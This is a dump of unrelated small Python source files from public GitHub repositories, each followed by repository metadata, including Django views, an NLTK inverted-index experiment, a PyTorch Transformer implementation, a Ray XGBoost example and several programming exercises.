import os
MOD = 10 ** 9 + 7
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = int(sys.stdin.buffer.readline().rstrip())
print('AGC' if N >= 2800 else 'ARC' if N >= 1200 else 'ABC')
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b17f118b3a48f23411c0605dccbd4d3d7d5ac331 | c75ec82316ed5322c5844912ce9c528c24360b9f | /nsd1903/devweb/day03/mysite/polls/views.py | 34549e6b8acdfc67276252944f7264401ca3a21a | [] | no_license | MrZhangzhg/nsd2019 | a94cde22f2e4bd648bb9e56ca63827f558f3c083 | 54f6d2c7b348a69f13ad5f38f2fbdc8207528749 | refs/heads/master | 2021-08-22T17:38:27.697675 | 2020-02-22T08:36:21 | 2020-02-22T08:36:21 | 183,539,489 | 21 | 24 | null | 2020-05-17T12:07:55 | 2019-04-26T02:06:16 | HTML | UTF-8 | Python | false | false | 1,327 | py | from django.shortcuts import render, redirect
from .models import Question
# Create your views here.
def index(request):
    """List all questions, newest first."""
    # Django passes the HTTP request as the first argument, so the view
    # function must accept at least one parameter.
    # return HttpResponse('<h1>Home page</h1>')
    # Fetch every question, ordered by pub_date descending.
    questions = Question.objects.order_by('-pub_date')
    return render(request, 'index.html', {'questions': questions})
def detail(request, question_id):
    """Show a single question so the user can pick a choice."""
    question = Question.objects.get(id=question_id)
    return render(request, 'detail.html', {'question': question})
def vote(request, question_id):
    """Record a vote for the submitted choice, then redirect to the results."""
    question = Question.objects.get(id=question_id)
    # request.POST is the dict-like mapping of the submitted form data.
    choice_id = request.POST.get('choice_id')
    # Look up the selected option through the question's choice set.
    choice = question.choice_set.get(id=choice_id)
    choice.votes += 1  # bump the vote count
    # NOTE(review): this read-modify-write is racy under concurrent votes;
    # an F('votes') + 1 update would be atomic — confirm before relying on
    # exact counts.
    choice.save()
    # Redirect so the browser's URL becomes the result page's URL; using
    # render() here would show the result template while the URL still
    # said "vote".
    return redirect('result', question_id)
def result(request, question_id):
    """Display the vote tallies for one question."""
    question = Question.objects.get(id=question_id)
    return render(request, 'result.html', {'question': question})
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
e13ae8c45049850fbfbfea34c7cd6ba0fef4b00a | 86d464653092d40abdbd2a125cb29af4de6ca44c | /experiment_scripts/inverted_indexing_test.py | be874046001a92303bd48125366d31b2f0190f11 | [] | no_license | lws803/CS3245 | ad6003729ead0bf871e131ca0c74676001a66f6a | b4c85388bb017fb21a4ccee14096230aeccecde9 | refs/heads/master | 2020-04-19T03:26:12.737752 | 2019-06-16T16:02:12 | 2019-06-16T16:02:12 | 167,934,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | from nltk.stem import *
from nltk.probability import FreqDist
import nltk
stemmer = PorterStemmer()
text = "penyetted penyet"
text1 = "penyet test helloed"
text2 = "penyetted hello"
texts = [text, text1, text2]
dictionary = {}
for i in range(0, 3):
for word in nltk.word_tokenize(texts[i]):
word = stemmer.stem(word) # Stem it first
if (word not in dictionary):
dictionary[word] = [i]
else:
if (i not in dictionary[word]):
dictionary[word].append(i)
# Porter stemmer can remove the -ed and -s etc etc
for items in dictionary:
print items, " ", dictionary[items]
# Texts are ordered by their index in increasing order
query1 = "penyet"
query2 = "hello"
query1 = stemmer.stem(query1)
query2 = stemmer.stem(query2)
queries = [[len(dictionary[query1]), query1], [len(dictionary[query2]), query2]]
queries.sort() # Sort the queries so we tackle the smallest one first
# We want to find a text which contains both penyet and hello
p1 = 0
p2 = 0
foundTexts = {}
# We can check both of them at the same time as their arrays are sorted
while (p1 < len(dictionary[queries[0][1]]) and p2 < len(dictionary[queries[1][1]])):
index1 = dictionary[queries[0][1]][p1]
index2 = dictionary[queries[1][1]][p2]
if (index1 < index2):
p1 += 1 # If index1 < index2 then we move p1 up
elif (index2 < index1):
p2 += 1 # vice versa for this one as well
elif (index1 == index2):
foundTexts[index1] = True
p1 += 1
p2 += 1
print foundTexts.keys()
# We want to find a text which contains penyet but not hello
foundTexts = {}
p1 = 0
p2 = 0
while (p1 < len(dictionary["penyet"]) and p2 < len(dictionary["hello"])):
index1 = dictionary["penyet"][p1]
index2 = dictionary["hello"][p2]
if (index1 < index2):
foundTexts[index1] = True # Here we use a set instead as the index could be added in multiple times
# If index1 < index2, means index2 does not contain the article we want, else they would have both been matched
# In this case, the second condition of !"hello" has to be found from the second pointer
p1 += 1
elif (index1 > index2):
p2 += 1
elif (index1 == index2):
p1 += 1
p2 += 1
foundTexts.pop(index1, None) # If found later on in the list, then just pop it off
print foundTexts.keys()
| [
"lws803@gmail.com"
] | lws803@gmail.com |
5f246ef3eb4100549c48eb0f4832a833d1d6a4ed | e6cce25fb4159112d5a395a63aa024ac409b40d2 | /CHALLENGES/100TASK/ex010.py | 1c683bf8551b6a15bd8a3464c23792719ddae1e6 | [] | no_license | batestin1/PYTHON | 729225e6f1db029ec1e725eced5fe89e884cccb4 | f7fb74dd755acf37920dee6a6f9e3663141232e9 | refs/heads/master | 2023-06-23T03:27:14.951229 | 2021-07-22T22:54:20 | 2021-07-22T22:54:20 | 370,337,387 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
import pandas
print('-*-'*30)
print('CONVERSAO DE DOLAR ')
print('Desenvolvido por Maycon Cypriano')
print('-*-'*30)
real = float(input('Quanto você tem na carteira: '))
dolar = real*0.18
print(f'Se você tem R$:{real} na carteira, então você tem USD:{round(dolar,2)}') | [
"mayconcipriano@gmail.com"
] | mayconcipriano@gmail.com |
882890653845d4203f7dbc442a563c4f17cbf708 | 19ca5093877d00b1cffcd0ec5c37e27ba2ceb347 | /lesson_03/task_2.py | a99b497abf4470a16621a728f53564a9eef35989 | [] | no_license | MichaelDc86/Algorythms | 10d424fb1bc667d088ecb7f8f01bf889ba2b6b22 | 072685eb045f0a29cc3abb7c008ef5677a7e5690 | refs/heads/master | 2020-05-15T23:57:41.608736 | 2019-05-29T06:39:35 | 2019-05-29T06:39:35 | 182,566,590 | 0 | 0 | null | 2019-05-29T06:39:36 | 2019-04-21T18:07:42 | Python | UTF-8 | Python | false | false | 943 | py | # Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2,
# второй массив надо заполнить значениями 1, 4, 5, 6 (или 0, 3, 4, 5, если индексация начинается с нуля),
# т.к. именно в этих позициях первого массива стоят четные числа.
import random
# Build a random-length array of random ints, then collect the 0-based
# positions of its even elements into a second array.
first = [random.randint(-99, 99) for _ in range(0, random.randint(1, 30))]
second = [position for position, value in enumerate(first) if value % 2 == 0]
print(f'Первый массив случайных чисел: {first}')
print(f'Второй массив, содержащий индексы четных элементов первого(нумерация с "0"): {second}')
| [
"lenskymiwa@ya.ru"
] | lenskymiwa@ya.ru |
113e7e10a6f4f6f4126931c451a7af984bdf89c7 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /875.koko-eating-bananas.python3.py | 67a20e8d792a6529bc38998bc86ee2ac85df6a73 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | #
# [907] Koko Eating Bananas
#
# https://leetcode.com/problems/koko-eating-bananas/description/
#
# algorithms
# Medium (42.86%)
# Total Accepted: 7.6K
# Total Submissions: 17.7K
# Testcase Example: '[3,6,7,11]\n8'
#
# Koko loves to eat bananas. There are N piles of bananas, the i-th pile has
# piles[i] bananas. The guards have gone and will come back in H hours.
#
# Koko can decide her bananas-per-hour eating speed of K. Each hour, she
# chooses some pile of bananas, and eats K bananas from that pile. If the pile
# has less than K bananas, she eats all of them instead, and won't eat any more
# bananas during this hour.
#
# Koko likes to eat slowly, but still wants to finish eating all the bananas
# before the guards come back.
#
# Return the minimum integer K such that she can eat all the bananas within H
# hours.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: piles = [3,6,7,11], H = 8
# Output: 4
#
#
#
# Example 2:
#
#
# Input: piles = [30,11,23,4,20], H = 5
# Output: 30
#
#
#
# Example 3:
#
#
# Input: piles = [30,11,23,4,20], H = 6
# Output: 23
#
#
#
#
# Note:
#
#
# 1 <= piles.length <= 10^4
# piles.length <= H <= 10^9
# 1 <= piles[i] <= 10^9
#
#
#
#
#
#
class Solution:
    def minEatingSpeed(self, piles, H):
        """
        :type piles: List[int]
        :type H: int
        :rtype: int

        Return the minimum integer eating speed K such that Koko can finish
        every pile within H hours, eating from at most one pile per hour
        (a pile of p bananas takes ceil(p / K) hours at speed K).

        The original method body was an empty stub.  The hours needed is
        monotonically non-increasing in K, so binary-search K over
        [1, max(piles)].  O(len(piles) * log(max(piles))).
        """
        def hours_needed(speed):
            # ceil(p / speed) without floats: (p + speed - 1) // speed
            return sum((p + speed - 1) // speed for p in piles)

        lo, hi = 1, max(piles)
        while lo < hi:
            mid = (lo + hi) // 2
            if hours_needed(mid) <= H:
                hi = mid        # mid is fast enough; try something slower
            else:
                lo = mid + 1    # too slow; must speed up
        return lo
"richnakasato@hotmail.com"
] | richnakasato@hotmail.com |
493992116f031f81f5b2f85c82bed18c7a906557 | 1a87ac9522591f25b03e6912ba3af3cca115abae | /authentication/views.py | babc97856be2925196aacd612175b88e59fbc097 | [
"MIT"
] | permissive | jyywong/InventoryMS | c67fdb0a051be5d136d9509e63b7fc0aeadcc324 | 9aac1324742730ce980e638f2156ece9eb44a593 | refs/heads/master | 2023-04-01T15:38:44.448813 | 2021-04-05T19:59:45 | 2021-04-05T19:59:45 | 350,162,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | # -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
from django.http import HttpResponse
from .forms import LoginForm, SignUpForm
def login_view(request):
    """Render the login form; on valid POST, authenticate and log the user in.

    Successful logins redirect to the "lab_list" view; failures re-render
    the form with an error message in ``msg``.
    """
    form = LoginForm(request.POST or None)
    msg = None
    if request.method == "POST":

        if form.is_valid():
            username = form.cleaned_data.get("username")
            password = form.cleaned_data.get("password")
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                return redirect("lab_list")
            else:
                msg = 'Invalid credentials'
        else:
            msg = 'Error validating the form'

    return render(request, "accounts/login.html", {"form": form, "msg" : msg})
def register_user(request):
    """Render the signup form; on valid POST, create the account.

    Sets ``success`` so the template can show the "please login" message
    instead of redirecting.
    """
    msg = None
    success = False

    if request.method == "POST":
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get("username")
            raw_password = form.cleaned_data.get("password1")
            # NOTE(review): the authenticated user is never used or logged
            # in here — the call only verifies the credentials round-trip.
            user = authenticate(username=username, password=raw_password)

            msg = 'User created - please <a href="/login">login</a>.'
            success = True

            #return redirect("/login/")

        else:
            msg = 'Form is not valid'
    else:
        form = SignUpForm()

    return render(request, "accounts/register.html", {"form": form, "msg" : msg, "success" : success })
| [
"wong.jonathan1@gmail.com"
] | wong.jonathan1@gmail.com |
40295ccd9ae060f231a5bedae45d9838221b52a3 | 01431aec3d6084b77faa62eae962c3a5ce07621a | /attention_is_all_you_need.py | 55b5443194eae9da8406c6123bbfa512c29aff15 | [] | no_license | jiyali/python-target-offer | e952cc77b0b3c4e4c77f5b9f67ef61bd7413354c | 214176b25caffea647f87bf816d3d712293c7c7f | refs/heads/master | 2020-07-29T05:53:57.930631 | 2020-05-13T15:04:08 | 2020-05-13T15:04:08 | 209,690,069 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,112 | py | # #############input Embedding ###############
class Embeddings(nn.Module):
    """Token embedding lookup, scaled by sqrt(d_model) as in the paper."""

    def __init__(self, d_model, vocab):
        super(Embeddings, self).__init__()
        self.lut = nn.Embedding(vocab, d_model)  # lookup table: id -> vector
        self.d_model = d_model  # embedding dimensionality

    def forward(self, x):
        """Map token ids to embedding vectors scaled by sqrt(d_model)."""
        scale = math.sqrt(self.d_model)
        return self.lut(x) * scale
# #############Positional Encoding############
class PositionalEncoding(nn.Module):
    "Inject sinusoidal position information (PE) into the input embeddings."
    def __init__(self, d_model, dropout, max_len=5000):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(p=dropout)

        # Precompute the [max_len, d_model] table of sin/cos waves.
        pe = torch.zeros(max_len, d_model)
        position = torch.arange(0., max_len).unsqueeze(1)
        # Geometric frequency ladder: 10000^(-2i/d_model) per dimension pair i.
        div_term = torch.exp(torch.arange(0., d_model, 2) *
                             -(math.log(10000.0) / d_model))
        pe[:, 0::2] = torch.sin(position * div_term)  # even columns
        pe[:, 1::2] = torch.cos(position * div_term)  # odd columns
        pe = pe.unsqueeze(0)  # [1, max_len, d_model]
        # Buffer: saved with the module's state but not a trainable parameter.
        self.register_buffer('pe', pe)

    def forward(self, x):
        # The model input is the word embedding plus the (frozen) positional
        # embedding, added element-wise over the first x.size(1) positions.
        x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)
        return self.dropout(x)
# Visualization: below, a sine wave is added per position; each dimension has
# a different frequency and phase offset.  Plots dimensions 4..7 over the
# first 100 positions.
plt.figure(figsize=(15, 5))
pe = PositionalEncoding(20, 0)
y = pe.forward(Variable(torch.zeros(1, 100, 20)))
plt.plot(np.arange(100), y[0, :, 4:8].data.numpy())
plt.legend(["dim %d"%p for p in [4,5,6,7]])
# ###########MultiHeadAttention#################
class MultiHeadedAttention(nn.Module):
    def __init__(self, h, d_model, dropout=0.1):
        "Take in model size and number of heads."
        super(MultiHeadedAttention, self).__init__()
        assert d_model % h == 0
        self.d_k = d_model // h  # per-head dimensionality
        self.h = h               # number of heads
        # Four projections: query, key, value, and the final output linear.
        self.linears = clones(nn.Linear(d_model, d_model), 4)
        self.attn = None         # last attention weights, kept for inspection
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, query, key, value, mask=None):
        """
        Multi-headed attention.
        Input q, k, v each have shape [batch, L, d_model].
        The output x has the same shape.
        """
        if mask is not None:
            # Same mask applied to all h heads.
            mask = mask.unsqueeze(1)
        nbatches = query.size(0)

        # 1) Project and reshape q/k/v: [batch, L, d_model] -> [batch, h, L, d_model/h]
        query, key, value = \
            [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
             for l, x in zip(self.linears, (query, key, value))]

        # 2) Compute attention, obtaining attn*v and attn.
        # qkv: [batch, h, L, d_model/h] --> x: [b, h, L, d_model/h], attn: [b, h, L, L]
        # NOTE: ``attention`` is the scaled dot-product helper defined
        # elsewhere in this file (not visible in this section).
        x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)

        # 3) Merge the heads back into the original sequence shape.
        x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)

        # Final output projection.
        return self.linears[-1](x)
# ################Add&Norm#################
class LayerNorm(nn.Module):
    """Layer normalization with learnable per-feature gain (a_2) and bias (b_2)."""

    def __init__(self, features, eps=1e-6):
        super(LayerNorm, self).__init__()
        self.a_2 = nn.Parameter(torch.ones(features))   # gain
        self.b_2 = nn.Parameter(torch.zeros(features))  # bias
        self.eps = eps  # keeps the denominator away from zero

    def forward(self, x):
        """Normalize over the last dimension, then scale and shift."""
        mu = x.mean(-1, keepdim=True)
        sigma = x.std(-1, keepdim=True)
        normalized = (x - mu) / (sigma + self.eps)
        return self.a_2 * normalized + self.b_2
class SublayerConnection(nn.Module):
    """Residual wrapper around any sublayer, pre-norm style:
    output = x + dropout(sublayer(norm(x))).
    """

    def __init__(self, size, dropout):
        super(SublayerConnection, self).__init__()
        self.norm = LayerNorm(size)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x, sublayer):
        """Add & Norm: normalize, apply the sublayer, drop out, add the residual."""
        residual = x
        return residual + self.dropout(sublayer(self.norm(x)))
# #############Feed-Forword Network###########
class PositionwiseFeedForward(nn.Module):
    "Position-wise feed-forward network: Linear -> ReLU -> Dropout -> Linear."
    def __init__(self, d_model, d_ff, dropout=0.1):
        super(PositionwiseFeedForward, self).__init__()
        self.w_1 = nn.Linear(d_model, d_ff)   # expand to the inner dimension
        self.w_2 = nn.Linear(d_ff, d_model)   # project back to the model size
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        """Apply the two-layer transform independently at every position."""
        hidden = F.relu(self.w_1(x))
        return self.w_2(self.dropout(hidden))
# ##########Encoder主架构的代码##############
def clones(module, N):
    "Produce N identical, independently parameterized copies of *module*."
    copies = (copy.deepcopy(module) for _ in range(N))
    return nn.ModuleList(copies)
class Encoder(nn.Module):
    """A stack of N identical encoder layers followed by a final LayerNorm."""

    def __init__(self, layer, N):
        super(Encoder, self).__init__()
        self.layers = clones(layer, N)
        self.norm = LayerNorm(layer.size)

    def forward(self, x, mask):
        """Pass the input (and mask) through every layer in order, then normalize."""
        for encoder_layer in self.layers:
            x = encoder_layer(x, mask)
        return self.norm(x)
# ############Decoder的代码主要结构##############
# Decoder部分
class Decoder(nn.Module):
    """Generic N-layer decoder stack with masking, ending in a LayerNorm."""

    def __init__(self, layer, N):
        super(Decoder, self).__init__()
        self.layers = clones(layer, N)
        self.norm = LayerNorm(layer.size)

    def forward(self, x, memory, src_mask, tgt_mask):
        """Run x through each decoder layer against the encoder memory, then normalize."""
        for decoder_layer in self.layers:
            x = decoder_layer(x, memory, src_mask, tgt_mask)
        return self.norm(x)
# ################mask#####################
def subsequent_mask(size):
    """
    Mask out future positions: return a [1, size, size] boolean tensor that is
    True on and below the diagonal (positions a query may attend to) and
    False strictly above it.
    """
    upper_triangle = np.triu(np.ones((1, size, size)), k=1).astype('uint8')
    return torch.from_numpy(upper_triangle) == 0
# ##########Encoder-Decoder Multi-head Attention###################
class DecoderLayer(nn.Module):
    "Decoder layer: masked self-attention, source attention, and feed forward."

    def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
        super(DecoderLayer, self).__init__()
        self.size = size
        self.self_attn = self_attn
        self.src_attn = src_attn
        self.feed_forward = feed_forward
        self.sublayer = clones(SublayerConnection(size, dropout), 3)

    def forward(self, x, memory, src_mask, tgt_mask):
        """Chain the three sublayers, each wrapped in a residual Add & Norm."""
        m = memory
        # 1) masked self-attention over the decoder input
        x = self.sublayer[0](x, lambda t: self.self_attn(t, t, t, tgt_mask))
        # 2) attention over the encoder output (memory)
        x = self.sublayer[1](x, lambda t: self.src_attn(t, m, m, src_mask))
        # 3) position-wise feed forward
        return self.sublayer[2](x, self.feed_forward)
# #########Linear and Softmax to Produce Output Probabilities############
class Generator(nn.Module):
    """
    Standard generation step: project the model output to vocabulary size with
    a linear layer, then apply log-softmax over the vocabulary dimension.
    """
    def __init__(self, d_model, vocab):
        super(Generator, self).__init__()
        self.proj = nn.Linear(d_model, vocab)  # d_model -> vocab logits
    def forward(self, x):
return F.log_softmax(self.proj(x), dim=-1) | [
"762115542@qq.com"
] | 762115542@qq.com |
e5d3bbcfe8a0f176cd05149a1ff34ab74cc535cf | e0980f704a573894350e285f66f4cf390837238e | /.history/flex/models_20201030102256.py | 24833cc279761223d63ee1229f3fb82f233a9c19 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,537 | py | from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import StreamFieldPanel
from wagtail.snippets.blocks import SnippetChooserBlock
from wagtail.images.blocks import ImageChooserBlock
from wagtail.core import blocks as wagtail_blocks
from streams import blocks
from home.models import new_table_options
class FlexPage(Page):
    """Generic "flex" page assembled from a free-form StreamField of content blocks."""
    parent_page_type = ["home.H"]
    # Editors compose the page body from any mix of these block types.
    body = StreamField([
        ('title', blocks.TitleBlock()),
        ('cards', blocks.CardsBlock()),
        ('image_and_text', blocks.ImageAndTextBlock()),
        ('cta', blocks.CallToActionBlock()),
        ('testimonial', SnippetChooserBlock(
            target_model='testimonials.Testimonial',
            template = 'streams/testimonial_block.html'
        )),
        ('pricing_table', blocks.PricingTableBlock(
            table_options=new_table_options,
        )),
        ('richtext', wagtail_blocks.RichTextBlock(
            template = 'streams/simple_richtext_block.html',
            features = ['bold', 'italic', 'ol', 'ul', 'link']
        )),
        ('large_image', ImageChooserBlock(
            help_text = 'Ten obraz będzie przycięty do 1200px na 775px',
            template='streams/large_image_block.html'
        ))
    ], null=True, blank=True)
    content_panels = Page.content_panels + [
        StreamFieldPanel('body'),
    ]
    class Meta:
        verbose_name = 'Flex (misc) page'
verbose_name_plural = 'Flex (misc) pages' | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
e2f4b4e6ea3c3f336a0d95eb369d269665bf9fb9 | b3699724907850fd26cbce4509fec83a33b89760 | /python/ray/util/xgboost/simple_example.py | f8881e75d0f5f6391b2239475889122141e005b5 | [
"Apache-2.0",
"MIT"
] | permissive | BonsaiAI/ray | 5e2f26a81d865a795261d11f9182aca7f07c7b97 | 941d30f082fe879ea30618af14327c25b5a21a74 | refs/heads/master | 2023-06-12T05:15:29.370188 | 2021-05-06T07:03:53 | 2021-05-06T07:03:53 | 233,708,687 | 3 | 5 | Apache-2.0 | 2023-05-27T08:06:37 | 2020-01-13T22:41:47 | Python | UTF-8 | Python | false | false | 1,114 | py | from sklearn import datasets
from sklearn.model_selection import train_test_split
from ray.util.xgboost import RayDMatrix, RayParams, train
# __xgboost_begin__
def main():
    """Train an XGBoost-on-Ray binary classifier on the breast-cancer dataset.

    Splits the data 75/25 into train/eval, trains with a single Ray actor,
    saves the booster to 'simple.xgb' and prints the final validation error.
    """
    # Load dataset
    data, labels = datasets.load_breast_cancer(return_X_y=True)
    # Split into train and test set
    train_x, test_x, train_y, test_y = train_test_split(
        data, labels, test_size=0.25)
    train_set = RayDMatrix(train_x, train_y)
    test_set = RayDMatrix(test_x, test_y)
    # Set config
    config = {
        "tree_method": "approx",
        "objective": "binary:logistic",
        "eval_metric": ["logloss", "error"],
        "max_depth": 3,
    }
    evals_result = {}  # filled in-place by train() with per-iteration metrics
    # Train the classifier
    bst = train(
        config,
        train_set,
        evals=[(test_set, "eval")],
        evals_result=evals_result,
        ray_params=RayParams(max_actor_restarts=1, num_actors=1),
        verbose_eval=False)
    bst.save_model("simple.xgb")
    print("Final validation error: {:.4f}".format(
        evals_result["eval"]["error"][-1]))
# __xgboost_end__
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | BonsaiAI.noreply@github.com |
df9cff14fdbf62a866cf77be1ff6d7b3f37cd1d0 | 236498cd8daf971ef53cd120051d76c72474330d | /fetch-gazettes.py | 4e65868eecf60ad83be066f8f9e8b4c0e60b7522 | [] | no_license | OpenUpSA/saflii-gazettes | 2106130e1e0dac45a630f4e26f583c56879bc9f2 | 12d25bf00c47d6f9e4d3950e0ef2373bd17c5589 | refs/heads/master | 2021-10-23T21:53:06.583034 | 2019-03-20T08:54:54 | 2019-03-20T08:54:54 | 81,817,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python
#
# Script to generate Registry.txt and pdf-urls.txt for gazettes from opengazettes.org.za
import json
import os
import os.path
entries = []  # human-readable registry lines, one per matching gazette
urls = []     # corresponding archive PDF URLs
# what jurisdiction code should we use?
with open("jurisdiction.txt") as f:
    jurisdiction = f.read().strip()
print "Only using gazettes for jurisdiction code: %s" % jurisdiction
# generate an entry for each gazette entry
# (the index is JSON Lines: one gazette object per line)
with open("gazette-index-latest.jsonlines", "r") as f:
    for line in f:
        gazette = json.loads(line)
        if gazette['jurisdiction_code'] != jurisdiction:
            continue
        fname = os.path.basename(gazette['archive_url'])
        urls.append(gazette['archive_url'])
        entries.append('"%s" (%s) %s' % (fname, gazette['publication_date'], gazette['issue_title']))
# write the new registry
with open("Registry.txt.new", "w") as f:
    f.write("\n".join(entries))
# write the new urls
with open("pdf-urls.txt.new", "w") as f:
    f.write("\n".join(urls))
# atomically rename the files
# (rename is atomic on POSIX, so readers never see a half-written file)
os.rename("Registry.txt.new", "Registry.txt")
os.rename("pdf-urls.txt.new", "pdf-urls.txt")
| [
"greg@kempe.net"
] | greg@kempe.net |
71fa9d5981516b87f29091fb9f9f3d80fb0b2f7b | 5dbb41859b177778b124d9f9ca5828ca8a5c529e | /aula10.py | e2d96a78cc4c84dc93ff526ed17ee6e25fbbf947 | [] | no_license | hevalenc/Curso_DIO_Python_basico | 4d7163a7496d17ec248472b075bfbb0988412d26 | 59a1e2aabc98f7bc3db49eea16170974fd75e9a3 | refs/heads/main | 2023-03-21T05:29:37.847492 | 2021-03-18T16:25:22 | 2021-03-18T16:25:22 | 349,142,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | #o 'datetime' é uma biblioteca do python, o comando 'strftime' serve para usar a biblioteca de data e hora
#'%d/%m/%y' e '%A %B %Y' são diretivas para definir o formato de exibição de data
#'%H:%M:%S' diretiva para horas,
from datetime import date, time, datetime, timedelta
def trabalhando_com_datetime():
    """Demonstrate datetime: formatting, weekday lookup, parsing and timedelta math."""
    agora = datetime.now()
    print(agora)
    print(agora.strftime('%d/%m/%Y %H:%M:%S'))
    print(agora.strftime('%c'))
    print(agora.day)
    print(agora.weekday())
    # weekday() yields Monday=0 .. Sunday=6, so this tuple maps it to a day name.
    dias_da_semana = ('segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sábado', 'domingo')
    print(dias_da_semana[agora.weekday()])
    data_fixa = datetime(2018, 6, 20, 15, 30, 20)
    print(data_fixa.strftime('%c'))
    texto = '01/01/2019 12:20:22'
    convertida = datetime.strptime(texto, '%d/%m/%Y %H:%M:%S')
    print(convertida)
    deslocamento = timedelta(days=365, hours=2)
    print(convertida - deslocamento)
    print(convertida + deslocamento)
def trabalhando_com_date():
    """Demonstrate date.today() and strftime formatting of a date object."""
    hoje = date.today()
    como_texto = hoje.strftime('%A %B %Y')
    print(type(hoje))
    print(como_texto)
    print(type(como_texto))
def trabalhando_com_time():
    """Demonstrate constructing a time object and formatting it with strftime."""
    momento = time(hour=15, minute=18, second=30)
    print(momento)
    momento_str = momento.strftime('%H:%M:%S')
    print(momento_str)
if __name__ == '__main__':
trabalhando_com_date()
trabalhando_com_time()
trabalhando_com_datetime()
| [
"heitorvalenca7@gmail.com"
] | heitorvalenca7@gmail.com |
63b17fc4261dad20778c5a4e48aa81f3868daa44 | fcdce57c1bd0cc4f52679fd0f3f82532550083fa | /282/bridgehand.py | 9b5c320bf36248545d8ba244453ecaab726c4014 | [] | no_license | nishanthegde/bitesofpy | a16a8b5fb99ab18dc1566e606170464a4df3ace0 | c28aa88e1366ab65f031695959d7cd0b3d08be6b | refs/heads/master | 2023-08-08T16:53:17.107905 | 2023-07-22T19:07:51 | 2023-07-22T19:07:51 | 183,959,400 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,209 | py | from enum import Enum
import typing
from dataclasses import dataclass, field
from collections import namedtuple, defaultdict
from collections.abc import Sequence
import random
from typing import List
from random import shuffle
suits = list("SHDC")
ranks = list("AKQJT98765432")
Suit = Enum("Suit", suits)
Rank = Enum("Rank", ranks)
Card = namedtuple("Card", ["suit", "rank"])
HCP = {Rank.A: 4, Rank.K: 3, Rank.Q: 2, Rank.J: 1}
SSP = {2: 1, 1: 2, 0: 3} # cards in a suit -> short suit points
@dataclass
class TestHand:
    # Fixture: one hand description plus its expected evaluation metrics.
    card_string: str      # e.g. "S:AKJ H:QJT9 D:5432 C:AK"
    doubletons: int       # expected number of 2-card suits
    singletons: int       # expected number of 1-card suits
    voids: int            # expected number of missing suits
    hcp: int              # expected high-card points
    ssp: int              # expected short-suit points
    total_points: int     # expected hcp + ssp
    ltc: int              # expected losing trick count
    card_list: List[Card] = field(init=False)
    def __post_init__(self):
        """ Generate actual list of Card instances from card_string """
        self.card_list = []
        for suit_holding in self.card_string.split():
            suit = Suit[suit_holding[0]]
            for rank in suit_holding[2:]:
                card = Card(suit, Rank[rank])
                self.card_list.append(card)
        shuffle(self.card_list)  # randomize order so the code under test must sort
test_hands = [
TestHand("S:AKJ H:QJT9 D:5432 C:AK", 1, 0, 0, 18, 1, 19, 6),
TestHand("S:A76 H:KT75 D:KQ2 C:AK8", 0, 0, 0, 19, 0, 19, 6),
TestHand("S:AKQJT98765432", 0, 0, 3, 10, 9, 19, 0),
TestHand("S:5432 H:5432 D:543 C:32", 1, 0, 0, 0, 1, 1, 11),
TestHand("S:K642 H:Q985 D:AT64 C:4", 0, 1, 0, 9, 2, 11, 7),
TestHand("S:KQ3 H:Q76 D:J43 C:J987", 0, 0, 0, 9, 0, 9, 9),
TestHand("S:A64 H:72 D:KJ8542 C:AJ", 2, 0, 0, 13, 2, 15, 7),
TestHand("S:AT4 H:86 D:A984 C:AKT7", 1, 0, 0, 15, 1, 16, 7),
TestHand("S:J972 H:9 D:98742 C:T54", 0, 1, 0, 1, 2, 3, 10),
TestHand("S:9854 H:K43 D:Q5 C:9873", 1, 0, 0, 5, 1, 6, 10),
TestHand("S:KT943 H:T63 D:JT5 C:97", 1, 0, 0, 4, 1, 5, 10),
